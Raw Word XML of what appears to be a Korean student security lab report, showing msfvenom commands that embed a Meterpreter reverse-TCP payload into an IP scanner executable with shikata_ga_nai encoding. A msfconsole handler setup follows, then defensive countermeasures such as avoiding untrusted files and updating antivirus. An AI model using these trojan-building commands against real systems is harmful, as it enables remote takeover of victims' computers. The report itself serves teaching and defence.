        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="7A21B6C8" w:rsidP="7A21B6C8" w:rsidRDefault="7A21B6C8" w14:paraId="512BC778" w14:textId="75940E8A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>
              <w:drawing>
                <wp:inline wp14:editId="34A59675" wp14:anchorId="66F9E44E">
                  <wp:extent cx="4572000" cy="1428750"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="8935649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d04aab7d4d410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A21B6C8" w:rsidTr="6E4C3C35" w14:paraId="343EB7F6">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="7A21B6C8" w:rsidP="7A21B6C8" w:rsidRDefault="7A21B6C8" w14:paraId="5256AC28" w14:textId="41481E87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②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msfvenom으로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다운받았던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exe파일과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똑같은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트로이목파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파일을 생성한다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="7A21B6C8" w:rsidP="7A21B6C8" w:rsidRDefault="7A21B6C8" w14:paraId="1693E20F" w14:textId="3E4530EA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Root@kali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:~/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Desktop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#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msfvenom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–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p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windows/meterpreter/reverse_tcp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lhost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=192.168.248.128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lport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=8080 –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f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exe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–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x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/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root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/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Desktop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/faIpScanner.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exe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-k –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e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x86/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shikata_ga_nal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–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i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</w:t>
            </w:r>
            <w:proofErr w:type="gram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5 &gt;</w:t>
            </w:r>
            <w:proofErr w:type="gram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/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root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/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Desktop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/faIpScanner_bak.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="7A21B6C8" w:rsidTr="6E4C3C35" w14:paraId="707ABD13">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="7A21B6C8" w:rsidP="7A21B6C8" w:rsidRDefault="7A21B6C8" w14:paraId="43E7B30D" w14:textId="0631FB7C">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline wp14:editId="0516C090" wp14:anchorId="435275AC">
                  <wp:extent cx="1819275" cy="1123950"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="15076336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df97b9dd774f7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192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21B6C8" w:rsidP="7A21B6C8" w:rsidRDefault="7A21B6C8" w14:paraId="798DACEA" w14:textId="7873CF1E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7A21B6C8" w:rsidTr="6E4C3C35" w14:paraId="39312BE7">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="7A21B6C8" w:rsidP="7A21B6C8" w:rsidRDefault="7A21B6C8" w14:paraId="71E9B4B5" w14:textId="1A55D6A5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7A21B6C8" w:rsidTr="6E4C3C35" w14:paraId="7C1159E3">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="7A21B6C8" w:rsidP="7A21B6C8" w:rsidRDefault="7A21B6C8" w14:paraId="15197910" w14:textId="34BDA42D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③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msfvenom으로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만든 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>exe파일을</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="7A21B6C8" w:rsidR="7A21B6C8">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:hAnsi="D2Coding" w:eastAsia="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 공격PC에 넣음.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="7A21B6C8" w:rsidTr="6E4C3C35" w14:paraId="0B4AE108">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="7A21B6C8" w:rsidP="7A21B6C8" w:rsidRDefault="7A21B6C8" w14:paraId="4B6F0F1C" w14:textId="048D0D34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>
              <w:drawing>
                <wp:inline wp14:editId="509624B3" wp14:anchorId="0254274F">
                  <wp:extent cx="4572000" cy="3267075"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2931707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05a2226a0441c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A21B6C8" w:rsidTr="6E4C3C35" w14:paraId="269C4D3F">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="7A21B6C8" w:rsidP="7A21B6C8" w:rsidRDefault="7A21B6C8" w14:paraId="2F033FA7" w14:textId="4890C1C3">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline wp14:editId="5D18A627" wp14:anchorId="2D774C1A">
                  <wp:extent cx="4572000" cy="2162175"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="5686736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b1f1a48eb9456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A21B6C8" w:rsidTr="6E4C3C35" w14:paraId="6B29F9BB">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="7A21B6C8" w:rsidP="07B3161E" w:rsidRDefault="7A21B6C8" w14:paraId="00E21E8C" w14:textId="4CF65DE6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④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msfconsole로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 트로이목마로 만든 프로그램 실행 시 상대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PC에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 접속</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="7A21B6C8" w:rsidP="07B3161E" w:rsidRDefault="7A21B6C8" w14:paraId="427E3D07" w14:textId="5D0AC45A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root@kali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:~/Desktop</w:t>
            </w:r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# msfconsole</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="7A21B6C8" w:rsidP="07B3161E" w:rsidRDefault="7A21B6C8" w14:paraId="3F7E8DFA" w14:textId="133B3506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Msf5 =&gt; use exploit/multi/handler</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="7A21B6C8" w:rsidP="07B3161E" w:rsidRDefault="7A21B6C8" w14:paraId="39E9E0D1" w14:textId="09CDF955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msf5 exploit(multi/handler) &gt; set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payload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window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/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meterpreter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/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reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="7A21B6C8" w:rsidP="07B3161E" w:rsidRDefault="7A21B6C8" w14:paraId="033350A8" w14:textId="47A90D51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msf5 exploit(multi/handler) &gt; set lhost 192.168.248.128</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="7A21B6C8" w:rsidP="07B3161E" w:rsidRDefault="7A21B6C8" w14:paraId="1BA00CE8" w14:textId="3AF963C1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msf5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exploit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(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multi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/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handler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) &gt;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set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lport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 8080</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="7A21B6C8" w:rsidP="7A21B6C8" w:rsidRDefault="7A21B6C8" w14:paraId="548CB44C" w14:textId="17E90ADB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msf5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exploit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(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multi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/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handler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve">) &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="07B3161E" w:rsidR="07B3161E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:hAnsi="D2Coding" w:eastAsia="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>expolit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="07B3161E" w:rsidTr="6E4C3C35" w14:paraId="7D806B6B">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="07B3161E" w:rsidP="07B3161E" w:rsidRDefault="07B3161E" w14:paraId="60905283" w14:textId="3E2C1946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69C5DF5B" w:rsidTr="6E4C3C35" w14:paraId="5D018E67">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="69C5DF5B" w:rsidP="6E4C3C35" w:rsidRDefault="69C5DF5B" w14:paraId="438E5DDF" w14:textId="2C1A530E">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:ind w:left="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69C5DF5B" w:rsidTr="6E4C3C35" w14:paraId="159EBD71">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="28AE8859" w14:textId="4301B3FC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69C5DF5B" w:rsidTr="6E4C3C35" w14:paraId="06C9DF44">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="749323C7" w14:textId="362A2189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69C5DF5B" w:rsidTr="6E4C3C35" w14:paraId="2FEA4B18">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="69C5DF5B" w:rsidP="69C5DF5B" w:rsidRDefault="69C5DF5B" w14:paraId="36B1D19A" w14:textId="3D700348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07B3161E" w:rsidTr="6E4C3C35" w14:paraId="7C2BF5CA">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="07B3161E" w:rsidP="07B3161E" w:rsidRDefault="07B3161E" w14:paraId="15F0BEBB" w14:textId="4E8A0FAB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07B3161E" w:rsidTr="6E4C3C35" w14:paraId="398FB121">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="07B3161E" w:rsidP="07B3161E" w:rsidRDefault="07B3161E" w14:paraId="53542550" w14:textId="3FA700AB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07B3161E" w:rsidTr="6E4C3C35" w14:paraId="1233FB6E">
        <w:trPr>
          <w:trHeight w:val="375"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10890" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="07B3161E" w:rsidP="07B3161E" w:rsidRDefault="07B3161E" w14:paraId="039920F7" w14:textId="0E1B8840">
            <w:pPr>
              <w:pStyle w:val="a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</w:tbl>
    <w:p w:rsidR="00836B5D" w:rsidP="7A21B6C8" w:rsidRDefault="00836B5D" w14:paraId="25790FC3" w14:textId="3C218E23">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac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92491B2" wp14:editId="6BBB90D0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>68580</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-224790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6772275" cy="9734550"/>
                <wp:effectExtent l="0" t="0" r="9525" b="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73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BF387E">
              <v:rect id="직사각형 66" style="position:absolute;left:0;text-align:left;margin-left:5.4pt;margin-top:-17.7pt;width:533.25pt;height:766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white [3212]" stroked="f" strokeweight="1pt" w14:anchorId="44F701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">
                <v:fill opacity="27499f"/>
                <w10:wrap anchorx="margin" anchory="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="7A21B6C8">
        <w:rPr/>
        <w:t/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a4"/>
        <w:tblW w:w="109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02"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE7966" w:rsidTr="6E4C3C35" w14:paraId="24950B0C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="873"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
              <w:bottom w:val="thinThickThinSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="0050741D" w:rsidR="00BE7966" w:rsidP="07B3161E" w:rsidRDefault="00CD7C05" w14:paraId="51C2431A" w14:textId="2F66A592">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:hAnsi="DX국민시대" w:eastAsia="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac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472C65BA" wp14:editId="719D1A4F">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="margin">
                        <wp:posOffset>-1905</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="margin">
                        <wp:posOffset>-285750</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6772275" cy="10201275"/>
                      <wp:effectExtent l="0" t="0" r="9525" b="952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201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8F852B5">
                    <v:rect id="직사각형 7" style="position:absolute;left:0;text-align:left;margin-left:-.15pt;margin-top:-22.5pt;width:533.25pt;height:803.2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white [3212]" stroked="f" strokeweight="1pt" w14:anchorId="133BC6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Pr="0050741D" w:rsidR="0050741D">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:hAnsi="DX국민시대" w:eastAsia="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">3. 보안진단 및 대책</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w:rsidTr="6E4C3C35" w14:paraId="61F3B49C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00BE7966" w:rsidR="00B67587" w:rsidP="0767C434" w:rsidRDefault="00B67587" w14:noSpellErr="1" w14:paraId="43C6D369" w14:textId="7287F196">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:hAnsi="D2Coding" w:eastAsia="D2Coding"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="07B3161E" w:rsidP="6E4C3C35" w:rsidRDefault="07B3161E" w14:paraId="17A0FFE2" w14:textId="513EBFB4">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:beforeLines="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:rightChars="0"/>
              <w:jc w:val="left"/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</w:pPr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 xml:space="preserve">이 시나리오는 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>metasploit으로</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 트로이목마를 제작해 공격 대상 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>PC에서</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 실행시켰을 경우 일반 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>백도어</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 파일처럼 관리자 권한 탈취하였다. 하지만 이것 외에도 많은 종류의 트로이목마가 있다. 트로이목마는 한번 설치되면 찾기 어렵기 때문에 처음부터 감염되지 않도록 주의하는 것이 </w:t>
            </w:r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>중요하다. 기본적으로</w:t>
            </w:r>
            <w:r w:rsidRPr="6E4C3C35" w:rsidR="6E4C3C35">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:hAnsi="D2Coding" w:eastAsia="D2Coding" w:cs="D2Coding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n-US" w:eastAsia="ko-KR"/>
              </w:rPr>
              <w:t xml:space="preserve"> 지켜야하는 수칙은 이렇다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00BE7966" w:rsidR="00B67587" w:rsidP="0767C434" w:rsidRDefault="00B67587" w14:paraId="108BE598" w14:textId="22C5347E">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050741D" w:rsidTr="6E4C3C35" w14:paraId="41FE8A28" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="6E4C3C35" w:rsidP="6E4C3C35" w:rsidRDefault="6E4C3C35" w14:paraId="3E62303E" w14:textId="5F5B34E2">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:ind w:leftChars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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr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 xml:space="preserve">출처가 불분명한 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>exe,ppt,hwp,doc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 등의 파일을 열람 금지</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="001C4D99" w:rsidR="001C4D99" w:rsidP="6E4C3C35" w:rsidRDefault="001C4D99" w14:paraId="3CBEC24C" w14:textId="724F77AF">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/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>윈도우같은</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>OS와</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 백신프로그램을 최신버전으로 업뎃</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="001C4D99" w:rsidR="001C4D99" w:rsidP="6E4C3C35" w:rsidRDefault="001C4D99" w14:paraId="5017F428" w14:textId="4F9BA471">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="6E4C3C35" w:rsidR="6E4C3C35">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:hAnsi="D2Coding" w:eastAsia="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>주기적으로 확인되지 않은 프로그램이 있는지 확인 및 비정상적인 프로세스 사용량이 있는지 확인해야함.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00024BC1" w:rsidTr="6E4C3C35" w14:paraId="5B536845" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="001E0EEF" w:rsidR="00024BC1" w:rsidP="00836B5D" w:rsidRDefault="00024BC1" w14:paraId="4EBD9D96" w14:textId="77777777">
            <w:pPr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  <w:tr w:rsidR="00024BC1" w:rsidTr="6E4C3C35" w14:paraId="05E56F61" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="001E0EEF" w:rsidR="00024BC1" w:rsidP="0767C434" w:rsidRDefault="00CD7C05" w14:paraId="34679C56" w14:noSpellErr="1" w14:textId="0857AC2D">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00024BC1" w:rsidTr="6E4C3C35" w14:paraId="6A2BB103" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00CD7C05" w:rsidR="00024BC1" w:rsidP="00836B5D" w:rsidRDefault="00CD7C05" w14:paraId="3B05D791" w14:noSpellErr="1" w14:textId="667877DC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidR="0767C434" w:rsidTr="6E4C3C35" w14:paraId="017AB374" wp14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0767C434" w:rsidP="0767C434" w:rsidRDefault="0767C434" w14:paraId="7E794440" w14:textId="0518F2F5">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w:rsidTr="6E4C3C35" w14:paraId="7BC46B0F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="873"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
              <w:bottom w:val="thinThickThinSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00CD7C05" w:rsidR="002761E0" w:rsidP="07B3161E" w:rsidRDefault="002761E0" w14:paraId="58DB9A89" w14:textId="7F2593C3">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:hAnsi="DX국민시대" w:eastAsia="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="07B3161E" w:rsidR="07B3161E">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:hAnsi="DX국민시대" w:eastAsia="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>4. 보안대책 적용시 공격결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w:rsidTr="6E4C3C35" w14:paraId="6439ACFB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:color="204E5F" w:sz="24" w:space="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0767C434" w:rsidP="0767C434" w:rsidRDefault="0767C434" w14:paraId="5B7DFAD2" w14:textId="47D29B87">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0767C434" w:rsidP="0767C434" w:rsidRDefault="0767C434" w14:paraId="2F18F9A8" w14:textId="38CE6395">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007950B5" w:rsidTr="6E4C3C35" w14:paraId="05E5AAB3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="007950B5" w:rsidR="007950B5" w:rsidP="0767C434" w:rsidRDefault="007950B5" w14:paraId="308BFFEB" w14:textId="1DF169AA">
            <w:pPr>
              <w:pStyle w:val="a0"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:hAnsi="D2Coding" w:eastAsia="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0016436D" w:rsidP="0767C434" w:rsidRDefault="00BE7966" w14:paraId="03A53594" w14:textId="589C497F">
      <w:pPr>
        <w:pStyle w:val="a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eastAsia="ko-KR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0016436D" w:rsidSect="00F21CD1">
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="851" w:footer="992" w:gutter="0"/>
      <w:cols w:space="425"/>
      <w:docGrid w:linePitch="360"/>
      <w:headerReference w:type="default" r:id="R6b5363d61a434d05"/>
      <w:footerReference w:type="default" r:id="R44233ef430ac45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5E3C" w:rsidP="000D6EBD" w:rsidRDefault="00D25E3C" w14:paraId="0625699E" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
